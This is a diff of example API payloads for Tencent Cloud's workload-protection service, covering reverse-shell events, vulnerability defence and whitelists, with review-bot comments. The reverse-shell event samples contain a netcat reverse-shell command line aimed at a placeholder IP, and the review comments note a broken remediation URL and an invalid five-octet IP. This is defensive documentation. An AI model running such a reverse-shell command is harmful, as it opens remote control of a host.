2215
  "document": "",
2228
2216
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
2229
- "output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"ParentProcUser\": \"xx\",\n \"UserGroup\": \"xx\",\n \"DetectBy\": 1,\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"CreateTime\": \"xx\",\n \"HarmDescribe\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"DstIp\": \"xx\",\n \"CmdLine\": \"xx\",\n \"ParentProcName\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ParentProcPath\": \"xx\",\n \"Id\": 1,\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"HostIp\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"FullPath\": \"xx\",\n \"DstPort\": 1,\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
2230
- "title": "示例"
2217
+ "output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"\",\n \"PsTree\": \"[]\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"ModifyTime\": \"2024-09-27 15:44:32\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否存在异常的网络连接;\\n2、隔离或者删除相关的木马文件;xa0\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会让受害主机创建一个交互式shell并连接黑客的远程控制服务器,黑客通过建立的通道,可以向受害主机发送指令并获得执行结果。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"db8fd5e1-6d57-405b-9f57-9d6d0589bdc8\"\n }\n}",
2218
+ "title": "查询反弹shell详情"
2231
2219
  }
2232
2220
  ],
2233
2221
  "DescribeReverseShellEvents": [
2234
2222
  {
2235
2223
  "document": "获取反弹Shell列表",
2236
2224
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEvents\n<公共请求参数>\n\n{}",
2237
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"UserName\": \"xx\",\n \"Status\": 1,\n \"ParentProcName\": \"xx\",\n \"DstIp\": \"xx\",\n \"Uuid\": \"xx\",\n \"CmdLine\": \"xx\",\n \"ProcTree\": \"xx\",\n \"MachineName\": \"xx\",\n \"DetectBy\": 1,\n \"ParentProcPath\": \"xx\",\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"Hostip\": \"xx\",\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"UserGroup\": \"xx\",\n \"FullPath\": \"xx\",\n \"DstPort\": 1,\n \"ParentProcUser\": \"xx\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2225
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"\",\n \"ProcTree\": \"null\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"\"\n },\n \"Pid\": 0,\n \"RiskLevel\": 1\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2238
2226
  "title": "获取反弹Shell列表"
2239
2227
  }
2240
2228
  ],
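Review bot: The added `SuggestScheme` text in the DescribeReverseShellEventInfo output contains the literal characters `xa0` (after `木马文件;`, after `链接:` and directly after the Linux URL). This looks like a non-breaking space whose escape lost its backslash. As written, the hardening link reads `https://cloud.tencent.com/document/product/296/9604xa0`, which is not the intended document URL, so anyone following the remediation advice lands on a wrong page. Replacing each `xa0` with a plain space, as the DescribeRiskDnsInfo example already does (`.../296/9604 \n`), fixes it. The DescribePrivilegeEventInfo hunk above has the same artefact in its `SuggestScheme`.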
@@ -2242,7 +2230,7 @@
2242
2230
  {
2243
2231
  "document": "获取反弹Shell规则列表",
2244
2232
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeReverseShellRules\n&<公共请求参数>",
2245
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"Uuid\": \"xx\",\n \"DestIp\": \"xx\",\n \"Hostip\": \"xx\",\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"Operator\": \"xx\",\n \"Id\": 1,\n \"DestPort\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2233
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"DestIp\": \"127.0.0.1\",\n \"DestPort\": \"\",\n \"ProcessName\": \"aaaaa\",\n \"IsGlobal\": 0,\n \"Operator\": \"\",\n \"Status\": 0,\n \"CreateTime\": \"2024-10-12 11:38:43\",\n \"ModifyTime\": \"2024-10-12 11:38:43\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2246
2234
  "title": "获取反弹Shell规则列表"
2247
2235
  }
2248
2236
  ],
@@ -2274,7 +2262,7 @@
2274
2262
  {
2275
2263
  "document": "查询恶意请求详情",
2276
2264
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
2277
- "output": "{\n \"Response\": {\n \"RiskDnsInfo\": {\n \"Url\": \"xx\",\n \"AccessCount\": 1,\n \"ProcessName\": \"xx\",\n \"ProcessMd5\": \"xx\",\n \"GlobalRuleId\": 1,\n \"UserRuleId\": 1,\n \"Status\": 1,\n \"CreateTime\": \"xx\",\n \"MergeTime\": \"xx\",\n \"Quuid\": \"xx\",\n \"HostIp\": \"xx\",\n \"Alias\": \"xx\",\n \"Description\": \"xx\",\n \"Id\": 1,\n \"Reference\": \"xx\",\n \"CmdLine\": \"xx\",\n \"Pid\": 1,\n \"Uuid\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineWanIp\": \"xx\",\n \"MachineStatus\": \"xx\"\n },\n \"RequestId\": \"xx\"\n }\n}",
2265
+ "output": "{\n \"Response\": {\n \"RequestId\": \"5d14133e-4727-4937-b076-6ff1b9a59f14\",\n \"RiskDnsInfo\": {\n \"Url\": \"www.xxxx.com\",\n \"AccessCount\": 7,\n \"ProcessName\": \"\",\n \"ProcessMd5\": \"\",\n \"GlobalRuleId\": 0,\n \"UserRuleId\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2024-10-24 09:10:13\",\n \"MergeTime\": \"2024-10-24 09:10:27\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Alias\": \"别名\",\n \"Description\": \"未知的APT组织\",\n \"Id\": 10001,\n \"Pid\": 0,\n \"CmdLine\": \"\",\n \"Reference\": \"\",\n \"SuggestScheme\": \"1、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2、隔离或者删除相关的木马文件;\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"Tags\": [\n \"apt\",\n \"apt\"\n ],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\"\n }\n }\n}",
2278
2266
  "title": "示例"
2279
2267
  }
2280
2268
  ],
@@ -2650,7 +2638,7 @@
2650
2638
  {
2651
2639
  "document": "",
2652
2640
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceEvent\n<公共请求参数>\n\n{}",
2653
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Count\": 0,\n \"City\": \"xx\",\n \"CveId\": \"xx\",\n \"VulName\": \"xx\",\n \"EventType\": 1,\n \"Status\": 0,\n \"PublicIp\": \"xx\",\n \"Alias\": \"xx\",\n \"CreateTime\": \"xx\",\n \"Quuid\": \"xx\",\n \"MergeTime\": \"xx\",\n \"VulId\": 1,\n \"SourcePort\": [\n 1\n ],\n \"PrivateIp\": \"xx\",\n \"SourceIp\": \"xx\",\n \"Id\": 0\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2641
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Alias\": \"harborV2_yancyw\",\n \"PrivateIp\": \"1.1.1.1\",\n \"PublicIp\": \"1.1.1.1\",\n \"UpgradeType\": 1,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"CveId\": \"CVE-2021-44228\",\n \"FixType\": 0,\n \"EventType\": 2,\n \"SourceIp\": \"\",\n \"City\": \"\",\n \"SourcePort\": [],\n \"CreateTime\": \"2024-10-23 11:41:10\",\n \"MergeTime\": \"2024-10-23 11:43:52\",\n \"Count\": 20,\n \"Status\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-12332112\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"机器名称\"\n }\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2654
2642
  "title": "获取漏洞防御事件列表"
2655
2643
  }
2656
2644
  ],
@@ -2674,7 +2662,7 @@
2674
2662
  {
2675
2663
  "document": "",
2676
2664
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginDetail\n<公共请求参数>\n\n{\n \"Quuid\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\"\n}",
2677
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 0,\n \"MainClass\": \"xx\",\n \"ErrorLog\": \"xx\",\n \"Pid\": 0,\n \"InjectLog\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2665
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Pid\": 2302060,\n \"MainClass\": \"org.springframework.boot.loader.JarLauncher\",\n \"Status\": 1,\n \"ErrorLog\": \"\",\n \"InjectLog\": \"\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2678
2666
  "title": "获取单台主机漏洞防御插件信息"
2679
2667
  }
2680
2668
  ],
@@ -2714,7 +2702,7 @@
2714
2702
  {
2715
2703
  "document": "漏洞影响主机列表",
2716
2704
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulEffectModules\n<公共请求参数>\n\n{\n \"Offset\": \"0\",\n \"Limit\": \"10\",\n \"VulId\": \"100435\"\n}",
2717
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"VulEffectModuleInfo\": [\n {\n \"Name\": \"xx\",\n \"FixCmd\": \"xx\",\n \"Rule\": \"xx\",\n \"Version\": \"xx\",\n \"Uuids\": [\n \"xx\"\n ],\n \"Path\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2705
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"VulEffectModuleInfo\": [\n {\n \"Name\": \"openssl-devel\",\n \"Version\": \"1:1.0.2k-19.el7\",\n \"FixCmd\": \"sudo yum update openssl-devel\\n\",\n \"Path\": \"/usr/include/openssl\",\n \"Rule\": \"openssl-devel version less than 1:1.0.2k-22.el7_9\",\n \"Uuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2718
2706
  "title": "漏洞影响主机列表"
2719
2707
  }
2720
2708
  ],
@@ -2729,8 +2717,8 @@
2729
2717
  "DescribeVulFixStatus": [
2730
2718
  {
2731
2719
  "document": "",
2732
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulFixStatus\n&FixId=1\n&<公共请求参数>",
2733
- "output": "{\n \"Response\": {\n \"FixEndTime\": \"xx\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"xx\",\n \"HostName\": \"xx\",\n \"FailReason\": \"xx\",\n \"Quuid\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"SnapshotId\": \"xx\",\n \"HostIp\": \"xx\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"xx\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"xx\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"HostName\": \"xx\",\n \"FailReason\": \"xx\",\n \"Quuid\": \"xx\",\n \"HostIp\": \"xx\"\n }\n ],\n \"FailCnt\": 1,\n \"VulId\": 1,\n \"Progress\": 1\n }\n ],\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\"\n }\n}",
2720
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulFixStatus\n<公共请求参数>\n\n{\n \"FixId\": \"1\"\n}",
2721
+ "output": "{\n \"Response\": {\n \"FixEndTime\": \"2019-12-25 11:57:15\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"快照名称\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"SnapshotId\": \"快照ID\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"2019-12-25 11:57:15\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"漏洞名称\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\"\n }\n ],\n \"FailCnt\": 1,\n \"VulId\": 1,\n \"Progress\": 1\n }\n ],\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\"\n }\n}",
2734
2722
  "title": "漏洞修护-查找主机漏洞修护进度"
2735
2723
  }
2736
2724
  ],
@@ -2913,7 +2901,7 @@
2913
2901
  "EditBashRules": [
2914
2902
  {
2915
2903
  "document": "新增/修改高危命令规则,之前的EditBashRule只支持用户输入单个IP去新增或修改高危命令规则,而该接口EditBashRules支持多服务器选择。",
2916
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"test\",\n \"Level\": 1,\n \"Rule\": \".*\",\n \"IsGlobal\": 0,\n \"Uuids\": [\n \"uuids1\",\n \"uuids2\"\n ]\n}",
2904
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"test\",\n \"Level\": 1,\n \"Rule\": \".*\",\n \"IsGlobal\": 0,\n \"Uuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n}",
2917
2905
  "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
2918
2906
  "title": "新增/修改高危命令规则"
2919
2907
  }
@@ -3258,7 +3246,7 @@
3258
3246
  {
3259
3247
  "document": "导出木马记录",
3260
3248
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportMalwares\n&<公共请求参数>",
3261
- "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"123\"\n }\n}",
3249
+ "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"100000\"\n }\n}",
3262
3250
  "title": "导出木马记录"
3263
3251
  }
3264
3252
  ],
@@ -3289,7 +3277,7 @@
3289
3277
  "ExportRansomDefenseBackupList": [
3290
3278
  {
3291
3279
  "document": "导出主机快照备份列表",
3292
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseBackupList\n<公共请求参数>\n\n{\n \"Filters\": [\n {\n \"Name\": \"abc\",\n \"Values\": [\n \"abc\"\n ],\n \"ExactMatch\": true\n }\n ],\n \"Order\": \"abc\",\n \"By\": \"abc\",\n \"Quuid\": \"abc\"\n}",
3280
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseBackupList\n<公共请求参数>\n\n{\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n}",
3293
3281
  "output": "{\n \"Response\": {\n \"TaskId\": \"123\",\n \"RequestId\": \"123123\"\n }\n}",
3294
3282
  "title": "导出主机快照备份列表"
3295
3283
  }
@@ -3426,7 +3414,7 @@
3426
3414
  {
3427
3415
  "document": "",
3428
3416
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportVulEffectHostList\n&VulId=100435\n&<公共请求参数>",
3429
- "output": "{\n \"Response\": {\n \"DownloadUrl\": \"xx\",\n \"RequestId\": \"xx\",\n \"TaskId\": \"xx\"\n }\n}",
3417
+ "output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
3430
3418
  "title": "导出漏洞影响主机列表"
3431
3419
  }
3432
3420
  ],
@@ -3442,7 +3430,7 @@
3442
3430
  {
3443
3431
  "document": "导出漏洞列表数据,获取下载url",
3444
3432
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportVulList\n&IfDetail=1\n&<公共请求参数>",
3445
- "output": "{\n \"Response\": {\n \"DownloadUrl\": \"xx\",\n \"RequestId\": \"xx\",\n \"TaskId\": \"xx\"\n }\n}",
3433
+ "output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
3446
3434
  "title": "导出漏洞列表数据,获取下载url"
3447
3435
  }
3448
3436
  ],
@@ -3708,15 +3696,15 @@
3708
3696
  {
3709
3697
  "document": "编辑登录审计白名单",
3710
3698
  "input": "https://cwp.tencentcloudapi.com/?Action=ModifyLoginWhiteInfo\n&HostLoginWhiteObj.Places.0.CityId=111\n&HostLoginWhiteObj.Places.0.ProvinceId=11\n&HostLoginWhiteObj.Places.0.CountryId=1\n&HostLoginWhiteObj.SrcIp=1.2.3.4\n&HostLoginWhiteObj.UserName=\"aaa\"\n&HostLoginWhiteObj.Id=128\n&HostLoginWhiteObj.Remark=\"updateRemark1\"\n&<公共请求参数>",
3711
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\"\n }\n}",
3699
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3712
3700
  "title": "编辑登录审计白名单"
3713
3701
  }
3714
3702
  ],
3715
3703
  "ModifyLoginWhiteRecord": [
3716
3704
  {
3717
3705
  "document": "编辑登录审计白名单",
3718
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLoginWhiteRecord\n<公共请求参数>\n\n{\n \"UserName\": \"abc\",\n \"SrcIp\": \"abc\",\n \"StartTime\": \"abc\",\n \"EndTime\": \"abc\",\n \"Remark\": \"abc\",\n \"IsGlobal\": 1,\n \"Id\": 1,\n \"Hosts\": [\n {\n \"Quuid\": \"abc\",\n \"Uuid\": \"abc\"\n }\n ],\n \"Places\": [\n {\n \"CityId\": 1,\n \"ProvinceId\": 1,\n \"CountryId\": 1,\n \"Location\": \"abc\"\n }\n ]\n}",
3719
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\"\n }\n}",
3706
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLoginWhiteRecord\n<公共请求参数>\n\n{\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1.1\",\n \"StartTime\": \"2019-12-25 11:57:15\",\n \"EndTime\": \"2019-12-25 11:57:15\",\n \"Remark\": \"备注\",\n \"IsGlobal\": 1,\n \"Id\": 1,\n \"Hosts\": [\n {\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n }\n ],\n \"Places\": [\n {\n \"CityId\": 1,\n \"ProvinceId\": 1,\n \"CountryId\": 1,\n \"Location\": \"1.1.1.1\"\n }\n ]\n}",
3707
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3720
3708
  "title": "编辑登录审计白名单"
3721
3709
  }
3722
3710
  ],
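Review bot: In the new ModifyLoginWhiteRecord request the whitelist source is `"SrcIp": "1.1.1.1.1"`, which has five octets and is not a valid IPv4 address. An example for an allow-list entry should be a value the service would accept, so `"SrcIp": "1.1.1.1"`, or better a documentation address such as `"192.0.2.10"` (constructed sample, RFC 5737). The same body sets `"Location": "1.1.1.1"` inside `Places`, next to the city, province and country ids. That field presumably expects a place name like the `中国:广东省:深圳市` string seen in the DescribeHostLoginList output, so it is worth confirming against the API definition.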
@@ -3755,8 +3743,8 @@
3755
3743
  "ModifyMalwareWhiteList": [
3756
3744
  {
3757
3745
  "document": "",
3758
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMalwareWhiteList\n<公共请求参数>\n\n{\n \"Id\": 10,\n \"QuuidList\": [\n \"xx\"\n ],\n \"Mode\": 0,\n \"Md5List\": [\n \"xx\"\n ]\n}",
3759
- "output": "{\n \"Response\": {\n \"RequestId\": \"xx\"\n }\n}",
3746
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMalwareWhiteList\n<公共请求参数>\n\n{\n \"Id\": 10,\n \"QuuidList\": [\n \"1c26308c-5493-4eaf-a817-112ec25f499e\"\n ],\n \"Mode\": 0,\n \"Md5List\": [\n \"d7455d1d714ffc2b08d141332ed3e563\"\n ]\n}",
3747
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3760
3748
  "title": "编辑木马白名单"
3761
3749
  }
3762
3750
  ],
@@ -3771,7 +3759,7 @@
3771
3759
  "ModifyNetAttackWhiteList": [
3772
3760
  {
3773
3761
  "document": "编辑网络攻击白名单",
3774
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"123\",\n \"Id\": 10001\n}",
3762
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"\",\n \"Id\": 10001\n}",
3775
3763
  "output": "{\n \"Response\": {\n \"RequestId\": \"1a07706f-368e-49e5-8967-594826f43d0d\"\n }\n}",
3776
3764
  "title": "编辑网络攻击白名单"
3777
3765
  }
@@ -3803,8 +3791,8 @@
3803
3791
  "ModifyReverseShellRulesAggregation": [
3804
3792
  {
3805
3793
  "document": "增加正则规则",
3806
- "input": "POST / HTTP/1.1\nHost: xxx\nContent-Type: application/json\nX-TC-Action: ModifyReverseShellRulesAggregation\n<公共请求参数>\n\n{\n \"IsGlobal\": 1,\n \"WhiteType\": 1,\n \"RuleRegexp\": \"xxx\",\n \"HandleHistory\": 1,\n \"GroupID\": \"\"\n}",
3807
- "output": "{\n \"Response\": {\n \"RequestId\": \"1\"\n }\n}",
3794
+ "input": "POST / HTTP/1.1\nHost: xxx\nContent-Type: application/json\nX-TC-Action: ModifyReverseShellRulesAggregation\n<公共请求参数>\n\n{\n \"IsGlobal\": 1,\n \"WhiteType\": 1,\n \"RuleRegexp\": \"sh cmdline\",\n \"HandleHistory\": 1,\n \"GroupID\": \"\"\n}",
3795
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3808
3796
  "title": "增加正则规则"
3809
3797
  }
3810
3798
  ],